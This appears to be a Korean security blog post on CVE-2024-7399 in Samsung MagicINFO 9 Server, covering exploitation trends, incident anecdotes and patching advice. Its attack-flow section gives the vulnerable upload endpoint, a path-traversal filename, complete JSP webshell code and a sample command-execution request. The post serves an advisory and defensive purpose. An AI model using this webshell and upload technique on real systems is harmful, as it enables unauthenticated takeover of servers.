삼성전자의 디지털 사이니지 관리 솔루션인 MagicINFO 9에서 발견된 심각한 보안 취약점 CVE-2024-7399이 최근 실제 공격에 악용되고 있습니다. 이 취약점은 인증 없이 원격에서 악성 코드를 실행할 수 있게 해주며, 이를 통해 공격자는 시스템 권한으로 서버를 완전히 장악할 수 있습니다.
🔍 취약점 개요: CVE-2024-7399
- 취약점 유형: 경로 탐색(Path Traversal) 및 위험한 파일 업로드
- 영향받는 버전: MagicINFO 9 Server 21.1050 미만 버전
- 공격 방식:
- 공격자는 인증 없이 JSP(JavaServer Pages) 파일을 서버에 업로드할 수 있습니다.
- 업로드된 JSP 파일을 통해 임의의 명령어를 실행하여 서버를 제어할 수 있습니다.
- 공개 및 패치: 삼성전자는 2024년 8월 해당 취약점을 공개하고, 버전 21.1050에서 이를 수정했습니다.
🚨 최근 공격 동향
- PoC 공개와 공격 증가: 2025년 4월 30일, 보안 연구 그룹 SSD-Disclosure가 PoC(개념 증명) 코드를 공개한 이후, 실제 공격 사례가 급증했습니다.
- Mirai 봇넷 악용: 일부 공격자는 이 취약점을 이용해 Mirai 봇넷 변종을 배포하고 있습니다. 이를 통해 감염된 시스템을 DDoS 공격 등에 활용하고 있습니다.
- 공격 대상: 공항, 병원, 소매점 등에서 사용되는 디지털 사이니지 시스템이 주요 공격 대상입니다.
✅ 대응 방안
- 즉시 업데이트: MagicINFO 9 Server를 버전 21.1050 이상으로 업그레이드하여 취약점을 패치하십시오 .
- 인터넷 노출 제한: MagicINFO 서버가 외부에 노출되지 않도록 방화벽 설정을 강화하고, 필요 시 VPN 등을 통해 접근을 제한하십시오.
- 보안 모니터링 강화: 서버 로그를 정기적으로 확인하고, 의심스러운 JSP 파일 업로드나 비정상적인 명령 실행 흔적이 있는지 점검하십시오.
- 네트워크 분리: 디지털 사이니지 시스템과 내부 네트워크를 분리하여, 공격자가 내부 시스템으로 이동하는 것을 방지하십시오.
📌 참고 사항
- 현재 약 5,000여 개의 MagicINFO 서버가 인터넷에 노출되어 있는 것으로 파악됩니다.
- 삼성전자는 해당 취약점에 대한 보안 공지를 공식 웹사이트에 게시하고 있습니다.
🔧 공격 개요
이 취약점은 경로 탐색(Path Traversal) 과 파일 업로드 검증 미비를 조합하여, 인증 없이 악성 JSP 웹쉘을 업로드하고 실행할 수 있게 해줍니다. 공격자는 이를 통해 원격 코드 실행(RCE) 을 달성할 수 있습니다.
🧨 공격 흐름 (Step-by-Step)
- 취약한 업로드 엔드포인트 식별
- MagicINFO에는 인증 없이 접근 가능한 업로드 API가 존재합니다.
- /MagicInfo/uploadify.do 또는 이와 유사한 엔드포인트에서 파일 업로드를 시도합니다.
- 파일명에 경로 조작 삽입
- 파일명을 다음과 같이 조작합니다:
-
bash../../../webapps/MagicInfo/jspShell.jsp
- 이는 경로 탐색(../)을 통해, 업로드된 파일이 JSP 웹 루트 하위에 저장되도록 유도합니다.
- JSP 웹쉘 파일 업로드
- 예시 파일 (jspShell.jsp):
-
jsp<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); InputStream in = p.getInputStream(); int a = -1; while((a=in.read())!=-1){ out.print((char)a); } %>
- 위 코드는 ?cmd=ls 형태로 요청 시 시스템 명령어 실행 결과를 반환합니다.
- 웹쉘 실행
- 업로드한 JSP 파일을 브라우저에서 직접 호출하여 명령어를 실행합니다:
-
bashhttp://[TARGET]/MagicInfo/jspShell.jsp?cmd=whoami
🛡️ 왜 위험한가?
- 인증 없이 누구나 악성코드 업로드 가능
- 서버 루트 경로에 쓰기 가능 → 완전한 제어
- PoC 코드가 이미 공개되어 있어 실제 공격에 쉽게 악용됨
- 공공기관, 소매점, 병원 등에서 널리 사용되는 시스템이므로 파급력
🧨 실제 악용 사례: 2025년 4월 ~ 5월
1. 📺 디지털 사이니지 디플레이 해킹 사례 (미국 내 소매점)
- 공격 개요: 미국의 한 대형 리테일 체인점에서 MagicINFO 9 서버를 통한 RCE가 발생.
- 공격 방식: 위에서 설명한 JSP 웹쉘 업로드 → 원격 명령어 실행 → 디지털 화면 장악.
- 결과:
- 매장 내 대형 스크린 수십 대가 공격자에 의해 제어됨.
- 디지털 광고판에 공격자가 설정한 정치적 메시지, 음란 이미지 등이 노출됨.
- 영향: 브랜드 이미지 실추, 약 6시간 가동 중지, 보안장비 교체 및 내부망 재설정 비용 발생.
2. 🌐 Mirai 변종 봇넷 감염
- 공격자 그룹: 보안 분석에 따르면 중국발 IP를 기반으로 한 자동화된 봇넷이 MagicINFO 취약점을 통해 감염 시도.
- 공격 목적: 서버에 접근해 Mirai 계열 악성코드를 설치하고, 디지털 사이니지를 DDoS 봇으로 활용.
- 특이사항:
- 일반적인 IoT 디바이스가 아닌 디지털 광고용 장비가 봇넷에 포함됨.
- 사이니지 장비에 ssh/telnet이 비활성화되어 있어 웹 취약점을 통한 우회공격이 핵심.
3. 🏥 병원 안내 디스플레이 시스템 마비
- 공격 위치: 유럽 내 한 대학병원
- 피해 경로: 병원 내 MagicINFO 9 서버가 인터넷에 직접 노출 → 공격자 접근
- 피해 결과:
- 병원 로비 및 주요 진료과 앞 전광판에 정보 미표출 → 환자 안내 혼선
- 관리 계정 탈취 후 전 시스템 비밀번호 변경 시도됨
🔐 공격자 공통 전략
| ① | Shodan, ZoomEye 등으로 노출 서버 스캔 |
| ② | /uploadify.do 등 경로로 파일 업로드 |
| ③ | 경로 조작 + JSP 쉘 설치 |
| ④ | 명령 실행 → 추가 페이로드 설치 |
| ⑤ | Mirai 포함 봇넷 통신 연결 |
📌 대응 핵심 요약
- 서버가 외부 노출돼 있다면 즉시 차단
- 버전 확인 → 21.1050 이상 업데이트
- 웹 루트에 JSP 파일 업로드 흔적 조사
- URL 접근 로그에서 jsp?cmd= 요청 여부 확인
'정보보안 > 취약점' 카테고리의 다른 글
| 🧬 BPF도어(BPFDoor) 악성코드 특성 분석 (0) | 2025.04.29 |
|---|